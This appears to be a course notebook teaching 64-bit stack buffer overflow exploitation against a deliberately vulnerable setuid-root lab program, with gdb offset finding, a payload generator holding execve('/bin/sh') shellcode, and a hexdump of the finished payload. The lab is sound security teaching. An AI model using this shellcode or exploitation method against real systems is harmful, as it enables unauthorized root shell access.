# Stack Overflow on 64-bit x86-64 Machine

- stack overflow on a 64-bit machine is similar to that on a 32-bit machine
- there are some minor differences and challenges that we need to consider

## Stack Layout

- the stack layout on a x64 architecture is similar to that on a x86 architecture
- the major difference is how arguments are passed to functions
- in x86, recall that all arguments are passed on the stack in reverse order
- in x64, the first six arguments are passed in registers:
    - `rdi`, `rsi`, `rdx`, `rcx`, `r8`, and `r9`
- if there are more than six arguments, the rest are passed on the stack
- let's say we have a function `foo` that takes eight arguments:
    - `int foo(int a, int b, int c, int d, int e, int f, int g, int h)`
- the first six arguments are passed in registers:
    - a -> `rdi`; b->`rsi`, c->`rdx`, d->`rcx`, e->`r8`, and f->`r9`
- the last two arguments are passed on the stack:

```
lower address       |      ...          |
    ↑               |  local var2       | <- rbp - 16
    ↑               |  local var1       | <- rbp - 8
    ↑               |  caller rbp       | <- rbp
    ↑               |  return address   | <- rbp + 8
    ↑               |  arg g            | <- rbp + 16
    ↑               |  arg h            | <- rbp + 24
higher address      |       ...         |
```

## Zeros in Address - A challenge
- looking at the stack layout above, exploiting a x64 stack overflow is similar to that on a x86 machine
- however, the return address is 8 bytes long
- x64 only uses 48 bits of the 64-bit address space from `0x0000000000000000` to `0x00007fffffffffff`
- this means that the return address will always have at least TWO bytes of zeros in the most significant bits
- having`\x00s` in the payload can be a challenge, beacuse the `strcpy` function will stop copying when it encounters a null byte (`\x00`)
- note that gdb will not print the most significant zeros, so you will see the address as `0x7fffffffe3c0` instead of `0x00007fffffffe3c0`
- however, in little-endian, the address will be stored as `0xc0e3ff7fffff0000`
- this means that the return address will have two null bytes at the end of the address
- even if the strcpy function stops copying at the first null byte, the saved return address of the caller will still be overwritten with the correct address with the two null bytes currently at the end of the address

## Example
- let's compile `/demos/stack_overflow/x64/stack.cpp` with the Makefile in the same directory
- Makefile compiles with all compiler protections disabled
- it also disables ASLR and stack canaries
- it compiles the program as setuid root, so that we can execute the program as root
- must run Makefile with sudo privilege

In [3]:
%pwd

'/workspaces/SoftwareSecurity/notebooks'

In [4]:
%cd ../demos/stack_overflow/x64/

/workspaces/SoftwareSecurity/demos/stack_overflow/x64


/home/codespace/.local/lib/python3.12/site-packages/IPython/core/magics/osm.py:417: UserWarning: This is now an optional IPython functionality, setting dhist requires you to install the `pickleshare` library.
  self.shell.db['dhist'] = compress_dhist(dhist)[-100:]


In [5]:
%pwd

'/workspaces/SoftwareSecurity/demos/stack_overflow/x64'

In [6]:
! ls

Makefile      exploit.py   peda-session-stack.exe.txt  stack.exe
bad.txt       good.txt	   peda.gdb		       stack_gdb
commands.gdb  pattern.txt  stack.cpp


In [7]:
! cat stack.cpp

#include <cstdlib>
#include <iostream>
#include <cstring>
#include <fstream>
#include <string>

using namespace std;

const int MAX_DATA = 200;

void vulnerable(char *str) {
	char buffer[100];
	strcpy(buffer, str);
	cout << buffer << endl;
}

int main(int argc, char *argv[]) {
	char data[MAX_DATA];
	//file_name = strcpy(file_name, argv[1]
	FILE *fin;
	fin = fopen(argv[1], "r");
	fread(data, sizeof(char), MAX_DATA, fin);
	vulnerable(data);
	cout << "All done..." << endl;
	return 0;
}



In [8]:
! make

g++ -g -Wall -std=c++17 -fno-stack-protector -z execstack -no-pie stack.cpp  -o stack.exe 
# must run make with sudo to disable randomaize_va_space
echo 0 | tee /proc/sys/kernel/randomize_va_space
tee: /proc/sys/kernel/randomize_va_space: Permission denied
0
make: *** [Makefile:24: build] Error 1


In [27]:
! sudo make

10981.99s - pydevd: Sending message related to process being replaced timed-out after 5 seconds


g++ -g -Wall -std=c++17 -fno-stack-protector -z execstack -no-pie stack.cpp  -o stack.exe 
# must run make with sudo to disable randomaize_va_space
echo 0 | tee /proc/sys/kernel/randomize_va_space
0
sudo chown root:root stack.exe 
sudo chmod +s stack.exe  


In [28]:
! ls -al

10997.03s - pydevd: Sending message related to process being replaced timed-out after 5 seconds


total 160
drwxrwxrwx+ 2 codespace codespace   4096 Jan 26 05:36 .
drwxrwxrwx+ 3 codespace root        4096 Jan 25 05:19 ..
-rw-------  1 codespace codespace    947 Jan 26 04:36 .gdb_history
-rw-rw-rw-  1 codespace codespace   1082 Jan 25 05:19 Makefile
-rw-rw-rw-  1 codespace codespace    301 Jan 25 05:19 bad.txt
-rw-rw-rw-  1 codespace codespace    128 Jan 26 04:44 badfile.bin
-rw-rw-rw-  1 codespace codespace    140 Jan 25 06:01 commands.gdb
-rw-rw-rw-  1 codespace codespace   1480 Jan 26 04:46 generate_payload.py
-rw-rw-rw-  1 codespace codespace     51 Jan 25 05:19 good.txt
-rw-rw-rw-  1 codespace codespace    500 Jan 26 04:38 pattern.txt
-rw-rw-rw-  1 codespace codespace     18 Jan 26 04:38 peda-session-stack.exe.txt
-rw-rw-rw-  1 codespace codespace     93 Jan 25 06:13 peda.gdb
-rw-rw-rw-  1 codespace codespace    489 Jan 25 05:19 stack.cpp
-rwsrwsrwx  1 root      root      108336 Jan 26 05:36 stack.exe


In [29]:
! cat commands.gdb

11095.93s - pydevd: Sending message related to process being replaced timed-out after 5 seconds


set args good.txt
break vulnerable
run
next
print $rbp
print &buffer
print "offset: "
print /d (void *)$rbp - (void *)&buffer
continue
quit


In [10]:
# running commands.gdb script
! gdb -x commands.gdb ./stack.exe

GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.2) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./stack.exe...
Breakpoint 1 at 0x4011f6: file stack.cpp, line 11.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffd090 ('A' <repeats 50 times>, "\n\367\377\177")
RBX: 0x401350 (<__libc_csu_init>:

In [26]:
# using peda to find the offset using cyclic pattern
# Look for [RSP] --> offset VALUE
! gdb -x peda.gdb ./stack.exe

GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.2) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./stack.exe...
Writing pattern of 500 chars to filename "pattern.txt"
Breakpoint 1 at 0x4011f6: file stack.cpp, line 11.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffd090 ("AAA%AAsAABAA$AAnAAC

In [21]:
# Python script to generate the payload
# make sure to FIX any FIXMEs to match your environment
! cat generate_payload.py

#! /usr/bin/env python3

import sys

# Replace the content with the actual shellcode
# 64-bit execve('/bin/sh') setuid shellcode
SHELLCODE = (
    "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
    "\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
    "\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
).encode('latin-1')

PAYLOAD_LEN = 112  # 112 Offset to rbp
SHELLCODE_LEN = len(SHELLCODE)
ADD_LEN = 8  # Length of the address 4 for 32-bit and 8 for 64-bit
NOP_LEN = PAYLOAD_LEN - SHELLCODE_LEN

RET_ADD = 0x7fffffffd000 + 200   # FIXME: Change this address

# Remove the 00 from the address
# Note, 200 is added because the address shown in the gdb is different from
# the actual address shown in the stack when the program is running.
# This is because gdb pushes some values to the stack before running the program.
# You can try different values to get the correct address if the attack is not successful.

#####################################################################
# Build the payload
# The content 

In [22]:
! python generate_payload.py

In [23]:
! wc -c badfile.bin

120 badfile.bin


In [30]:
! hexdump -C badfile.bin

11305.95s - pydevd: Sending message related to process being replaced timed-out after 5 seconds


00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000050  90 90 90 90 90 90 90 90  90 90 48 31 d2 52 48 b8  |..........H1.RH.|
00000060  2f 62 69 6e 2f 2f 73 68  50 48 89 e7 52 57 48 89  |/bin//shPH..RWH.|
00000070  e6 48 31 c0 b0 3b 0f 05  bc d1 ff ff ff 7f 00 00  |.H1..;..........|
00000080


In [24]:
# create a /bin/sh symlink to /bin/zsh
! sudo ln -sf /bin/zsh /bin/sh

### Exploitation

- run `stack.exe badfile.bin` from the Terminal to exploit the program with the payload in `badfile.bin`
- the program will execute the payload and spawn a shell as root
- the return address in the payload is many need to be adjusted to land it in the NOP sled
- you may need to do a bit of trial and error to get the correct address to land in the NOP sled
- you can write a bash script to automate the process

## Small Buffer Challenge
- if the buffer is too small to fit the payload, you can't put the payload in the buffer before the return address
- you can't put the payload after the return address because of the null bytes in the return address
     - strcpy will stop copying when it encounters the null bytes
- however, the payload is already loaded into main's stack frame
- you can find the address of the payload in main's stack and use that address as the return address
- this is left as an exercise for the reader